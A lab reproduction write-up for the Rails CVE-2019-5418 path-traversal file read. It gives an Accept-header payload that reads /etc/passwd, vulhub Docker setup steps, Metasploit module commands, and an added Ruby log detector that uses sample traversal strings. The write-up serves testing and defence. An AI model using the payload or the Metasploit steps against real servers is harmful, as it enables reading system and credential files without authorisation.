CVE-2019-5418 vulnerability reproduction
0x00 Vulnerability introduction
Ruby on Rails is a web application framework built on the Ruby language; it is a relatively new web application framework.
0x01 Vulnerability principle
When a controller renders a view outside the application with render file, the specific file location is determined by the Accept header the user sends.
Passing Accept: ../../../../../../../../etc/passwd{{ therefore constructs a path traversal and reads an arbitrary file.
(The {{ closes the template path.)
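The following detector is added here as an example; it is not code from the original post, from Rails or from vulhub. It flags request log lines whose Accept header carries the traversal pattern described above and shows a path-containment check of the kind a safe file lookup needs. The log format, the sample lines, and the safe_template_path helper are assumptions made for illustration.

```ruby
# Added example: detect the CVE-2019-5418 Accept-header pattern in constructed
# access-log lines, and show a containment check for template file lookups.
require 'cgi'

TRAVERSAL_RE = %r{\.\.[/\\]}

# True when an Accept value, after percent-decoding, contains "../" (or "..\")
# or the "{{" template-closing marker the write-up describes.
def suspicious_accept?(accept)
  return false if accept.nil?
  decoded = CGI.unescape(accept)
  decoded.match?(TRAVERSAL_RE) || decoded.include?('{{')
end

# Constructed sample access log (assumed format): ip, method, path, quoted Accept.
SAMPLE_LOG = <<~LOG
  10.0.0.5 GET /robots "text/html,application/xhtml+xml"
  10.0.0.9 GET /robots "../../../../../../../../etc/passwd{{"
  10.0.0.7 GET /robots "application/json"
  10.0.0.9 GET /robots "..%2f..%2f..%2fetc%2fpasswd{{"
LOG

LOG_LINE_RE = /\A(\S+) (\S+) (\S+) "([^"]*)"\z/

# Parse one line of the assumed log format into a hash, or nil if it does not match.
def parse_log_line(line)
  m = LOG_LINE_RE.match(line.strip)
  m && { ip: m[1], method: m[2], path: m[3], accept: m[4] }
end

# Return the parsed records whose Accept header matches the traversal pattern.
def flag_traversal_requests(log)
  log.each_line.filter_map { |l| parse_log_line(l) }
     .select { |r| suspicious_accept?(r[:accept]) }
end

# Illustrative containment check (not the actual Rails patch): resolve the
# requested name under the template root and refuse anything that escapes it.
def safe_template_path(root, requested)
  root = File.expand_path(root)
  full = File.expand_path(requested, root)
  full.start_with?(root + File::SEPARATOR) ? full : nil
end

if __FILE__ == $PROGRAM_NAME
  flag_traversal_requests(SAMPLE_LOG).each do |r|
    puts "ALERT #{r[:ip]} #{r[:method]} #{r[:path]} Accept=#{r[:accept]}"
  end
end
```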
0x02 Affected versions
All versions of Rails. The fixed releases are:
6.0.0.beta3
5.2.2.1
5.1.6.2
5.0.7.2
4.2.11.1
0x03 Vulnerability fix
https://github.com/rails/rails/commit/f4c70c2222180b8d9d924f00af0c7fd632e26715
0x04 Vulnerable environment
cd vulhub/rails/CVE-2019-5418
docker-compose build
docker-compose up -d    (it is recommended to switch to a domestic mirror source first)
docker ps
http://192.168.139.137:3000
0x05 Vulnerability reproduction
Method 1: capture the request with Burp and modify the packet
Method 2: Metasploit
msfconsole
search rails
use auxiliary/gather/rails_doubletap_file_read
options
set rhost 192.168.139.137
set rport 3000
set route robots
exploit    (the vulnerability exists)